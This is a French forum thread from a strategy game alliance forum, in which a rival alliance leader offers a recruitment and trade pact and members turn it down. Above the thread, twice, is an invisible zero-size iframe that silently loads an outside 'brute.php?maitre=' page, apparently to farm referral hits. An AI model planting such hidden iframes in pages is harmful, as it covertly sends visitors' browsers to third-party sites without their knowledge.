Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
Le deal à ne pas rater :
ETB Pokémon Fable Nébuleuse : où acheter le coffret dresseur ...
Voir le deal

 

 Salut bande de Pulsar

Aller en bas 
5 participants
AuteurMessage
L'Arménien




Messages : 5
Date d'inscription : 05/06/2009

Salut bande de Pulsar Empty
MessageSujet: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 8:21

Salut Bande de Pulsar ^^ vous allez bien ? sa dort ici c'est quoi sa les Pulsar dorment ! ! ! réveillez vous la ! ! ! !

Ok ok maintenant que j'ai toute votre attention je vais vous raconter quelque chose :

d'abord je viens en ami donc n'ayez pas peur je ne vous recyclerais pas ... ( ok trêve de connerie )

je suis le Parrain de la famille Mafia je suis ici pour vous vous offrir mon amitié et du commerce en cas de besoin donc sa se rapprocherai un peu du pacte total, dans mon alliance nous sommes pour le moment que deux moi et mon luneur cependant il y a 2 ou 3 personnes qui vont me rejoindre ainsi nous serons bientôt Top 100 mais ce n'est pas ce qui m'intéresse en priorité.

L'objectif de ma venue ici est de vous proposer une alliance avec mon alliance... en quoi sa consiste ?
vous êtes classé 4 eme vous devez avoir des propositions de recrutement venant de tops 800 jusqu'à TOP 100 votre recrutement est restreint je suppose ... oui ^^ donc je vous propose de recruter vos candidats inintéressants( Pas top 100 vus que vous prenez les top 100) ainsi nos 2 alliance seront en étroite collaboration et en plus si je recrute vos candidats inintéressants en fait c'est idiot mais comme sa vous gardez contacte avec eux et ce qu'il ne faut pas négliger c'est le commerce et le pouvoir militaire que cela peut vous apporter ... techniquement ils ne seront pas des pulsar étant donné qu'ils seront dans Mafia mais nous serons en pacte totale et en cas de besoin nous serons la pour les Pulsar ...


Mes Respects bands d'endormis

L'Arménien
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 9:22

it 's a joke

enfin bref pour faire du commerce pas besoin de pacte pour le recrutement nous nous debrouillons tres bien (je pense )


donc je laisse les autres donner leur avis
Revenir en haut Aller en bas
L'Arménien




Messages : 5
Date d'inscription : 05/06/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 9:34

lol it is not a joke je demande pas de pacte je m'en fou a la limite j'ai des pactes interne avec 6 alliances top 50 donc bon ...
ce qu'il me faut c'est des membres et c'est pour sa que je vien vous voir renvoyez moi les candidatures que vous refusez ... c'est ce que je demande
Revenir en haut Aller en bas
PinkPanther

PinkPanther


Messages : 53
Date d'inscription : 26/05/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 9:40

Bha voit avec tes 6 alliance top 50 alors...

Nous on est pas une alli intermédiaire qui envoi comme sa les candid des autres

POur ma part:


NI commerce,ni pacte ni association de recrutement

Après avoir avec les autres mais a mon avis Mad
Revenir en haut Aller en bas
L'Arménien




Messages : 5
Date d'inscription : 05/06/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 9:46

je ne vois pas avec les autre je l'ai demandé a vous apres c'est soit accepté soit refusé il n'y a pas de souci ... c'est juste pour viter de perdre du monde en refusant leurs candidatures vous les auriez renvoyé chez moi ainsi les gens qui vous ont demandé restent a votre disposition ... pas de pacte ni rien vous gagnez du personnel c'est tout ... apres je comprends votre position ...
Revenir en haut Aller en bas
PinkPanther

PinkPanther


Messages : 53
Date d'inscription : 26/05/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 10:07

Si quelqu'un de l alliance est d accord de mp les candidat qui postulent pour leur dirent d aller chez vous moi je m en fou mais sa ne seras pas moi c est sur

Bonne chance a+ bon jeux
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 11:00

nous n'avons pas besoin de pouponniere


donc pas de wing chez nous donc pas de candid refuse car c'est nous qui choississons nos menbres

le choix est fait donc pas de bebe a jeter avec l'eau du bain donc tu peux go away
Revenir en haut Aller en bas
L'Arménien




Messages : 5
Date d'inscription : 05/06/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 11:36

lol ok i go away vous n'etes pas vraiment hospitalier ... pas grave en cas de besoin je reste a votre disposition ...

Merci de votre attention

Bon jeu

Bless
Revenir en haut Aller en bas
admin




Messages : 67
Date d'inscription : 25/05/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 12:55

salut l'Arménien Smile

bienvenue sur le fofo !!

pour se qui et du recrutement on recherche pas spécialement de nouveau joueur désoler !

en commerce , je te propose que quand y a le besoin , tu passe sur le fofo en partie commerce !

pour se qui et des wing pactes .... ! on se limite à une alliance mère , et niveau pactes on trouve uni bien assez mineur Sad What a Face


bon jeu Wink et bon commerce si y a Smile
Revenir en haut Aller en bas
http://pulsar.monally.com
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 13:32

Bienvenue sur le fofo Wink

Désolé ça ne nous intéresse pas trop de faire des alliance ou quoi...

Puit les qql joueurs qui ose posé candi et qu'on a refusé sont tous top 100, donc ça m'étonnerait qu'il viennent chez vous Wink.

Maintenant si vous avez du deut à vendre je serait la lol Smile
Revenir en haut Aller en bas
L'Arménien




Messages : 5
Date d'inscription : 05/06/2009

Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitimeVen 5 Juin - 17:22

dans l'univers 58 j'ai du deut mais ici je viens d'avoir ce compte et disons que l'ancien propriétaire a géré le compte vraiment pitoyablement ... bref je me refait pour le moment et pour le deut je vous tient au courant pas de souci et au passage si vous connaissez quelqu'un qui a un compte univers 6 classé j'échange soit ce compte qui maintenant commence a tenir debout ou mon compte univers 58 avec 7 lunes a son actif ... Merci

Mes respects

Bless
Revenir en haut Aller en bas
Contenu sponsorisé





Salut bande de Pulsar Empty
MessageSujet: Re: Salut bande de Pulsar   Salut bande de Pulsar Icon_minitime

Revenir en haut Aller en bas
 
Salut bande de Pulsar
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Salut a vous les Pulsars

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Ambassade-
Sauter vers: